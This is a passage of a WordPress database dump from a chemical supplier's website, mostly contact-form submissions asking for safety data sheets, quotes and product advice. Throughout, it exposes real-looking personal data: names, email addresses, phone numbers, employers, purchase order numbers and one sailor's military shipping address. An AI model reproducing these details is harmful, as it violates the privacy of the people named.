Safety and Handling information.\r\n\r\nMiller-Stephenson is an Epon 830 Supplier and certified from Hexion for direct distribution, technical support, and formulation modifications. <a href="https://www.miller-stephenson.com/tech-support/">For Technical Service Question please click here</a>'); 
INSERT INTO `wp_postmeta` VALUES (26523, 882, '_yoast_wpseo_linkdex', '100'); 
INSERT INTO `wp_postmeta` VALUES (26526, 3073, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (26527, 3073, '_seq_num', '120'); 
INSERT INTO `wp_postmeta` VALUES (26528, 3073, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (26529, 3073, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (26530, 3073, '_field_1', 'Nolen Prater'); 
INSERT INTO `wp_postmeta` VALUES (26531, 3073, '_field_10', 'USN'); 
INSERT INTO `wp_postmeta` VALUES (26532, 3073, '_field_2', 'nolen.prater@fe.navy.mil'); 
INSERT INTO `wp_postmeta` VALUES (26533, 3073, '_field_8', '(808) 349-7137'); 
INSERT INTO `wp_postmeta` VALUES (26534, 3073, '_field_3', 'to whom it may concern,\n\nI&#039;m a forward deployed USN Sailor needing a quote.   \nKRYTOX GPL 104 in the 1KG tax exempt sent to the fallowing address via DHL\nor FED EX\nCFAF AIMD ATSUGI\nBLDG-194\nOOGAMI, AYASE-SHI\nKENAGAWA KEN, JAPAN\n252-1101\nATTN: MATERIAL CONTROL  \n'); 
INSERT INTO `wp_postmeta` VALUES (26535, 3073, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (26536, 3073, '_sub_id', '3073'); 
INSERT INTO `wp_postmeta` VALUES (26537, 3074, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (26538, 3074, '_seq_num', '134'); 
INSERT INTO `wp_postmeta` VALUES (26539, 3074, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (26540, 3074, '_field_12', 'Charles Sweetman'); 
INSERT INTO `wp_postmeta` VALUES (26541, 3074, '_field_13', 'Wesco Aircraft'); 
INSERT INTO `wp_postmeta` VALUES (26542, 3074, '_field_18', '179'); 
INSERT INTO `wp_postmeta` VALUES (26543, 3074, '_field_14', 'Charles.Sweetman@wescoair.com'); 
INSERT INTO `wp_postmeta` VALUES (26544, 3074, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (26545, 3074, '_field_16', 'Good Morning,\n\nCould you please provide a SDS in English (UK) and Turkish for the product MS-143XD which was sold to us PO# 2328026.\n\nKind regards,\n\nCharles Sweetman | SDS Technician | Newton Road | Crawley, West Sussex RH10 9TY | GB\nTel: +44 1293449515   | Email: Charles.Sweetman@wescoair.com  | Web: www.wescoair.com'); 
INSERT INTO `wp_postmeta` VALUES (26546, 3074, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (26547, 3074, '_sub_id', '3074'); 
INSERT INTO `wp_postmeta` VALUES (26548, 3075, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (26549, 3075, '_seq_num', '121'); 
INSERT INTO `wp_postmeta` VALUES (26550, 3075, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (26551, 3075, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (26552, 3075, '_field_1', 'Jenifer Boyd'); 
INSERT INTO `wp_postmeta` VALUES (26553, 3075, '_field_10', 'PPG Aerospace'); 
INSERT INTO `wp_postmeta` VALUES (26554, 3075, '_field_2', 'jboyd@ppg.com'); 
INSERT INTO `wp_postmeta` VALUES (26555, 3075, '_field_8', '(404) 353-5217'); 
INSERT INTO `wp_postmeta` VALUES (26556, 3075, '_field_3', 'Could you please send the most recent US English version SDS for the following kit:\nGAC115AA, EPON 828 /EPI-CURE 3140, QUART '); 
INSERT INTO `wp_postmeta` VALUES (26557, 3075, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (26558, 3075, '_sub_id', '3075'); 
INSERT INTO `wp_postmeta` VALUES (26559, 3077, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (26560, 3077, '_seq_num', '135'); 
INSERT INTO `wp_postmeta` VALUES (26561, 3077, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (26562, 3077, '_field_12', 'Gary  Boudreau'); 
INSERT INTO `wp_postmeta` VALUES (26563, 3077, '_field_13', 'Newmont Mining'); 
INSERT INTO `wp_postmeta` VALUES (26564, 3077, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (26565, 3077, '_field_14', 'gary.boudreau@newmont.com'); 
INSERT INTO `wp_postmeta` VALUES (26566, 3077, '_field_15', '(303) 708-4280'); 
INSERT INTO `wp_postmeta` VALUES (26567, 3077, '_field_16', 'Need SDS for MS-180/CO Freon TF'); 
INSERT INTO `wp_postmeta` VALUES (26568, 3077, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (26569, 3077, '_sub_id', '3077'); 
INSERT INTO `wp_postmeta` VALUES (26570, 3078, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (26571, 3078, '_seq_num', '136'); 
INSERT INTO `wp_postmeta` VALUES (26572, 3078, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (26573, 3078, '_field_12', 'Rebecca Cannon'); 
INSERT INTO `wp_postmeta` VALUES (26574, 3078, '_field_13', 'Chemical Information Mgmt. Systems'); 
INSERT INTO `wp_postmeta` VALUES (26575, 3078, '_field_18', '182'); 
INSERT INTO `wp_postmeta` VALUES (26576, 3078, '_field_14', 'cannon.cims@gmail.com'); 
INSERT INTO `wp_postmeta` VALUES (26577, 3078, '_field_15', '(423) 339-0694'); 
INSERT INTO `wp_postmeta` VALUES (26578, 3078, '_field_16', 'We are updating our MSDS files.  Would you please e-mail a new GHS SDS for:  MS-122N/CO2 PTFE Release Agent/Dry Lube\nThank you.  '); 
INSERT INTO `wp_postmeta` VALUES (26579, 3078, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (26580, 3078, '_sub_id', '3078'); 
INSERT INTO `wp_postmeta` VALUES (26581, 3079, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (26582, 3079, '_seq_num', '137'); 
INSERT INTO `wp_postmeta` VALUES (26583, 3079, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (26584, 3079, '_field_12', 'Nicole Dean'); 
INSERT INTO `wp_postmeta` VALUES (26585, 3079, '_field_13', 'NALCO Champion'); 
INSERT INTO `wp_postmeta` VALUES (26586, 3079, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (26587, 3079, '_field_14', 'nicole.dean@ecolab.com'); 
INSERT INTO `wp_postmeta` VALUES (26588, 3079, '_field_15', '(303) 923-6468'); 
INSERT INTO `wp_postmeta` VALUES (26589, 3079, '_field_16', 'I would like SDS for the Following product. We no longer need to use this product. We would like to know how to properly dispose of these materials.\r\n\r\nVersamid 125\r\nVersamid 140\r\nEPON Resin 828\r\n\r\n\r\nThank you,\r\nNicole Dean'); 
INSERT INTO `wp_postmeta` VALUES (26590, 3079, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (26591, 3079, '_sub_id', '3079'); 
INSERT INTO `wp_postmeta` VALUES (26593, 3080, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (26594, 3080, '_seq_num', '138'); 
INSERT INTO `wp_postmeta` VALUES (26595, 3080, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (26596, 3080, '_field_12', 'Danish Nizami'); 
INSERT INTO `wp_postmeta` VALUES (26597, 3080, '_field_13', 'ADLube &amp; Industrial Services'); 
INSERT INTO `wp_postmeta` VALUES (26598, 3080, '_field_18', '184'); 
INSERT INTO `wp_postmeta` VALUES (26599, 3080, '_field_14', 'adlubeservices@gmail.com'); 
INSERT INTO `wp_postmeta` VALUES (26600, 3080, '_field_15', '(300) 946-5453'); 
INSERT INTO `wp_postmeta` VALUES (26601, 3080, '_field_16', 'Kindly send the details for the distribution of your products in Lahore Pakistan. We are currently Dealing in Industrial Lubricating services.'); 
INSERT INTO `wp_postmeta` VALUES (26602, 3080, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (26603, 3080, '_sub_id', '3080'); 
INSERT INTO `wp_postmeta` VALUES (26604, 3081, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (26605, 3081, '_seq_num', '122'); 
INSERT INTO `wp_postmeta` VALUES (26606, 3081, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (26607, 3081, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (26608, 3081, '_field_1', 'Chris Kear'); 
INSERT INTO `wp_postmeta` VALUES (26609, 3081, '_field_10', 'Leonardo '); 
INSERT INTO `wp_postmeta` VALUES (26610, 3081, '_field_2', 'christopher.kear@leonardocompany.com'); 
INSERT INTO `wp_postmeta` VALUES (26611, 3081, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (26612, 3081, '_field_3', 'Can you able to forward me a Health &amp; Safety Data sheet for your product MS-381HM. \nThanks,\nChris Kear'); 
INSERT INTO `wp_postmeta` VALUES (26613, 3081, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (26614, 3081, '_sub_id', '3081'); 
INSERT INTO `wp_postmeta` VALUES (26615, 3082, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (26616, 3082, '_seq_num', '139'); 
INSERT INTO `wp_postmeta` VALUES (26617, 3082, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (26618, 3082, '_field_12', 'Eric Lam How Yee'); 
INSERT INTO `wp_postmeta` VALUES (26619, 3082, '_field_13', 'Wesco Aircraft'); 
INSERT INTO `wp_postmeta` VALUES (26620, 3082, '_field_18', '185'); 
INSERT INTO `wp_postmeta` VALUES (26621, 3082, '_field_14', 'EricLamHowYee@wescoair.com'); 
INSERT INTO `wp_postmeta` VALUES (26622, 3082, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (26623, 3082, '_field_16', 'Dear Madam, dear Sir,\r\n\r\n\r\nCould you please provide me a REACH/CLP SDS in English (United Kingdom market) and could I have a Turkish SDS as well?\r\n\r\nName: MS-143XD Product Use: Release Agent or Dry Lubricant\r\nDPMS-Z0625B\r\nPTFE Release Agent/Dry Lubricant\r\n\r\nPO is 2405256, IID 536826 MID 149578\r\n\r\nMany thanks,\r\n\r\n\r\nEric\r\n'); 
INSERT INTO `wp_postmeta` VALUES (26624, 3082, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (26625, 3082, '_sub_id', '3082'); 
INSERT INTO `wp_postmeta` VALUES (26626, 3083, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (26627, 3083, '_seq_num', '140'); 
INSERT INTO `wp_postmeta` VALUES (26628, 3083, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (26629, 3083, '_field_12', 'VENOT'); 
INSERT INTO `wp_postmeta` VALUES (26630, 3083, '_field_13', 'AIR FRANCE'); 
INSERT INTO `wp_postmeta` VALUES (26631, 3083, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (26632, 3083, '_field_14', 'stvenot@airfrance.fr'); 
INSERT INTO `wp_postmeta` VALUES (26633, 3083, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (26634, 3083, '_field_16', 'Dear Mrs, Mr,\nI need to introduce product MS-126H (connector lubricant) in our materials data base.\nCould you please send me the Safety Data Sheet (SDS). I would appreciate for French version in accordance with EU regulation.\nBest regards.\nStéphane VENOT\nAir France Industries\nMaterials &amp; Procedures'); 
INSERT INTO `wp_postmeta` VALUES (26635, 3083, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (26636, 3083, '_sub_id', '3083'); 
INSERT INTO `wp_postmeta` VALUES (26637, 3084, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (26638, 3084, '_seq_num', '141'); 
INSERT INTO `wp_postmeta` VALUES (26639, 3084, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (26640, 3084, '_field_12', 'Zach Mertens'); 
INSERT INTO `wp_postmeta` VALUES (26641, 3084, '_field_13', ''); 
INSERT INTO `wp_postmeta` VALUES (26642, 3084, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (26643, 3084, '_field_14', 'zachary.mertens@ge.com'); 
INSERT INTO `wp_postmeta` VALUES (26644, 3084, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (26645, 3084, '_field_16', 'I am updating my MSDS books and need the newest SDS for Heloxy 107 '); 
INSERT INTO `wp_postmeta` VALUES (26646, 3084, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (26647, 3084, '_sub_id', '3084'); 
INSERT INTO `wp_postmeta` VALUES (26649, 2474, '_wp_old_slug', 'conformal-coating'); 
INSERT INTO `wp_postmeta` VALUES (26654, 3089, '_edit_lock', '1480425661:3'); 
INSERT INTO `wp_postmeta` VALUES (26655, 3090, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (26656, 3090, '_seq_num', '123'); 
INSERT INTO `wp_postmeta` VALUES (26657, 3090, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (26658, 3090, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (26659, 3090, '_field_1', 'Julio Sanchez'); 
INSERT INTO `wp_postmeta` VALUES (26660, 3090, '_field_10', 'Bridgestone Neumaticos de Monterrey S.A de C.V.'); 
INSERT INTO `wp_postmeta` VALUES (26661, 3090, '_field_2', 'sanchezjulio@bfusa.com'); 
INSERT INTO `wp_postmeta` VALUES (26662, 3090, '_field_8', '(818) 154-9419'); 
INSERT INTO `wp_postmeta` VALUES (26663, 3090, '_field_3', 'Good day is possible send my the quotation of (2 cases at 12 container) of product MS-136W for e-mail\n\nThanks  '); 
INSERT INTO `wp_postmeta` VALUES (26664, 3090, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (26665, 3090, '_sub_id', '3090'); 
INSERT INTO `wp_postmeta` VALUES (26666, 3089, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (26669, 3093, '_wp_attached_file', '2016/11/Scavaging1.jpg'); 
INSERT INTO `wp_postmeta` VALUES (26670, 3093, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:322;s:6:"height";i:241;s:4:"file";s:22:"2016/11/Scavaging1.jpg";s:5:"sizes";a:3:{s:25:"display_product_thumbnail";a:4:{s:4:"file";s:22:"Scavaging1-250x241.jpg";s:5:"width";i:250;s:6:"height";i:241;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:22:"Scavaging1-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:22:"Scavaging1-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (26671, 3089, '_disclaimer_post_meta', ''); 
INSERT INTO `wp_postmeta` VALUES (26672, 3089, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (26673, 3089, 'U_S_C_message', ''); 
INSERT INTO `wp_postmeta` VALUES (26674, 3089, '_yoast_wpseo_focuskw_text_input', 'Conformal Coating Defects and Repairs'); 
INSERT INTO `wp_postmeta` VALUES (26675, 3089, '_yoast_wpseo_focuskw', 'Conformal Coating Defects and Repairs'); 
INSERT INTO `wp_postmeta` VALUES (26676, 3089, '_yoast_wpseo_title', 'Common Conformal Coating Defects and Repairs | Miller-Stephenson'); 
INSERT INTO `wp_postmeta` VALUES (26677, 3089, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (26678, 3089, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (26679, 3089, '_yoast_wpseo_primary_category', '216'); 
INSERT INTO `wp_postmeta` VALUES (26680, 3089, '_yoast_wpseo_linkdex', '68'); 
INSERT INTO `wp_postmeta` VALUES (26683, 3098, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (26684, 3098, '_seq_num', '124'); 
INSERT INTO `wp_postmeta` VALUES (26685, 3098, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (26686, 3098, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (26687, 3098, '_field_1', 'Dr. Mark Baxter'); 
INSERT INTO `wp_postmeta` VALUES (26688, 3098, '_field_10', 'AmeriCAFS'); 
INSERT INTO `wp_postmeta` VALUES (26689, 3098, '_field_2', 'mbaxter@americafs.com'); 
INSERT INTO `wp_postmeta` VALUES (26690, 3098, '_field_8', '(702) 210-2800'); 
INSERT INTO `wp_postmeta` VALUES (26691, 3098, '_field_3', 'I need a lubricant that will endure a radioactive environment.  For that reason, greases that are thickened with PTFE (such as Teflon) are not suitable.    Do you manufacture any PFPE, PFAE or PFPAE lubricants in a thickened, grease form that are not thickened with PTFE?  '); 
INSERT INTO `wp_postmeta` VALUES (26692, 3098, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (26693, 3098, '_sub_id', '3098'); 
INSERT INTO `wp_postmeta` VALUES (26694, 3099, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (26695, 3099, '_seq_num', '142'); 
INSERT INTO `wp_postmeta` VALUES (26696, 3099, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (26697, 3099, '_field_12', 'Paul Fleming'); 
INSERT INTO `wp_postmeta` VALUES (26698, 3099, '_field_13', 'Harris Corporation'); 
INSERT INTO `wp_postmeta` VALUES (26699, 3099, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (26700, 3099, '_field_14', 'pfleming@harris.com'); 
INSERT INTO `wp_postmeta` VALUES (26701, 3099, '_field_15', '(321) 727-6849'); 
INSERT INTO `wp_postmeta` VALUES (26702, 3099, '_field_16', 'We have been using MS-122AX for over a decade in our application.  We were able to purchase a very large quantity in March 2013 when we heard it was being discontinued.  At the time, we were also recommended to try MS-122AD and MS-122XD as alternatives.  It appeared MS-122XD was the best direct replacement of the two.  \nWe spray the mold release to an acrylic surface with silicone rubber features, which is not heated.  It forms the top of a cavity in a part that we want the UV-curing adhesive to cure to...but we do want the UV-curing adhesive to release from the acrylic part with small silicone pads.  We also need UV light to get through the mold released acrylic, but this was not a problem for the MS-122AX.  We also were told in 2013 that the AX was not the ideal choice for what we were doing, but somebody started using it and that&#039;s what we use.\nAfter making some preparation to switch to MS-122XD, I see that this has apparently been discontinued.  Would we be able to find out why?  Are any other MS-122 formulations getting close to being discontinued?  It looks like our current choice may be between MS-122AD and MS-122SE.  Can you please recommend the best replacement for our application?\nThanks'); 
INSERT INTO `wp_postmeta` VALUES (26703, 3099, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (26704, 3099, '_sub_id', '3099'); 
INSERT INTO `wp_postmeta` VALUES (26705, 3101, '_wp_attached_file', '2016/11/shutterstock_516734293.jpg'); 
INSERT INTO `wp_postmeta` VALUES (26706, 3101, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1000;s:6:"height";i:668;s:4:"file";s:34:"2016/11/shutterstock_516734293.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_516734293-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_516734293-800x534.jpg";s:5:"width";i:800;s:6:"height";i:534;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_516734293-768x513.jpg";s:5:"width";i:768;s:6:"height";i:513;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_516734293-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_516734293-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_516734293-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_516734293-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (26707, 3089, '_thumbnail_id', '3101'); 
INSERT INTO `wp_postmeta` VALUES (26709, 3104, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (26710, 3104, '_seq_num', '125'); 
INSERT INTO `wp_postmeta` VALUES (26711, 3104, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (26712, 3104, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (26713, 3104, '_field_1', 'Colleen Cannon'); 
INSERT INTO `wp_postmeta` VALUES (26714, 3104, '_field_10', 'SLIPS Technologies'); 
INSERT INTO `wp_postmeta` VALUES (26715, 3104, '_field_2', 'colleen@slipstechnologies.com'); 
INSERT INTO `wp_postmeta` VALUES (26716, 3104, '_field_8', '(978) 387-6022'); 
INSERT INTO `wp_postmeta` VALUES (26717, 3104, '_field_3', 'Hi, I&#039;m looking to purchase some Krytox 105.\r\n\r\nFeel free to contact me at your earliest convenience!'); 
INSERT INTO `wp_postmeta` VALUES (26718, 3104, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (26719, 3104, '_sub_id', '3104'); 
INSERT INTO `wp_postmeta` VALUES (26720, 3105, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (26721, 3105, '_seq_num', '126'); 
INSERT INTO `wp_postmeta` VALUES (26722, 3105, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (26723, 3105, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (26724, 3105, '_field_1', 'Adam Burbach'); 
INSERT INTO `wp_postmeta` VALUES (26725, 3105, '_field_10', 'Vishay Intertechnology'); 
INSERT INTO `wp_postmeta` VALUES (26726, 3105, '_field_2', 'adam.burbach@vishay.com'); 
INSERT INTO `wp_postmeta` VALUES (26727, 3105, '_field_8', '(605) 668-4211'); 
INSERT INTO `wp_postmeta` VALUES (26728, 3105, '_field_3', 'The datasheets available on your website do not give a recommended cure time for EPON 828 mixed with EPIKURE W. Could you please supply the recommended cure times and associated material properties?\r\n\r\nRegards,\r\nAdam Burbach \r\nProduct Engineer\r\nVishay Inductors Division – Custom Products\r\n1505 E. Hwy 50\r\nYankton, SD 57078\r\n(605) 668-4211 - Office\r\n\r\n'); 
INSERT INTO `wp_postmeta` VALUES (26729, 3105, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (26730, 3105, '_sub_id', '3105'); 
INSERT INTO `wp_postmeta` VALUES (26731, 3106, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (26732, 3106, '_seq_num', '143'); 
INSERT INTO `wp_postmeta` VALUES (26733, 3106, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (26734, 3106, '_field_12', 'Atish'); 
INSERT INTO `wp_postmeta` VALUES (26735, 3106, '_field_13', ''); 
INSERT INTO `wp_postmeta` VALUES (26736, 3106, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (26737, 3106, '_field_14', 'atish.kulkarni22@gmail.com'); 
INSERT INTO `wp_postmeta` VALUES (26738, 3106, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (26739, 3106, '_field_16', 'Hello,\r\n\r\nCould you please let me know what adhesives you provide to medical device equipment companies.\r\nThank you.'); 
INSERT INTO `wp_postmeta` VALUES (26740, 3106, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (26741, 3106, '_sub_id', '3106'); 
INSERT INTO `wp_postmeta` VALUES (26742, 3107, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (26743, 3107, '_seq_num', '127'); 
INSERT INTO `wp_postmeta` VALUES (26744, 3107, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (26745, 3107, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (26746, 3107, '_field_1', 'Roger'); 
INSERT INTO `wp_postmeta` VALUES (26747, 3107, '_field_10', 'Internet Marketing Company'); 
INSERT INTO `wp_postmeta` VALUES (26748, 3107, '_field_2', 'roger@getbusinessontop.com'); 
INSERT INTO `wp_postmeta` VALUES (26749, 3107, '_field_8', '(901) 306-1554'); 
INSERT INTO `wp_postmeta` VALUES (26750, 3107, '_field_3', 'We can put your website on 1st page of Google to drive relevant traffic to your site. Let us know if you would be interested in getting detailed proposal. We can also schedule a call &amp; will be pleased to explain our services in detail. We look forward to hearing from you soon. Thanks!'); 
INSERT INTO `wp_postmeta` VALUES (26751, 3107, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (26752, 3107, '_sub_id', '3107'); 
INSERT INTO `wp_postmeta` VALUES (26753, 3108, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (26754, 3108, '_seq_num', '128'); 
INSERT INTO `wp_postmeta` VALUES (26755, 3108, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (26756, 3108, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (26757, 3108, '_field_1', 'Hengy Priscilla'); 
INSERT INTO `wp_postmeta` VALUES (26758, 3108, '_field_10', 'amacaerospace switzerland'); 
INSERT INTO `wp_postmeta` VALUES (26759, 3108, '_field_2', 'priscilla.hengy@amacaerospace.com'); 
INSERT INTO `wp_postmeta` VALUES (26760, 3108, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (26761, 3108, '_field_3', 'Good day,\nMay I ask you please to send me the safety data sheet concerning the MS-260 / cleaning foam / aerosol , please, as soon as possible, I need it urgently.\nMany thanks in advance for your help and cooperation,\nHave a nice day,\nPriscilla Hengy'); 
INSERT INTO `wp_postmeta` VALUES (26762, 3108, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (26763, 3108, '_sub_id', '3108'); 
INSERT INTO `wp_postmeta` VALUES (26764, 400, '_wp_old_slug', 'dry-film-release-agent'); 
INSERT INTO `wp_postmeta` VALUES (26765, 310, '_wp_old_slug', 'semi-permanent-mold-release-agents'); 
INSERT INTO `wp_postmeta` VALUES (26766, 297, '_wp_old_slug', 'dry-film-release-agents'); 
INSERT INTO `wp_postmeta` VALUES (26767, 297, '_wp_old_slug', 'water-based-release-agents'); 
INSERT INTO `wp_postmeta` VALUES (26768, 423, '_wp_old_slug', 'mold-release-agent'); 
INSERT INTO `wp_postmeta` VALUES (26769, 3109, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (26770, 3109, '_seq_num', '129'); 
INSERT INTO `wp_postmeta` VALUES (26771, 3109, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (26772, 3109, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (26773, 3109, '_field_1', 'Andrew Kawalec'); 
INSERT INTO `wp_postmeta` VALUES (26774, 3109, '_field_10', 'General Dynamics Mission Systems'); 
INSERT INTO `wp_postmeta` VALUES (26775, 3109, '_field_2', 'Andrew.Kawalec@gd-ms.com'); 
INSERT INTO `wp_postmeta` VALUES (26776, 3109, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (26777, 3109, '_field_3', 'Can you provide me with any industry best practice certifications?\nISO 9000 or some thing comparable. \nThank you\nAndy K'); 
INSERT INTO `wp_postmeta` VALUES (26778, 3109, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (26779, 3109, '_sub_id', '3109'); 
INSERT INTO `wp_postmeta` VALUES (26780, 3110, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (26781, 3110, '_seq_num', '144'); 
INSERT INTO `wp_postmeta` VALUES (26782, 3110, '_action', 'submit'); 
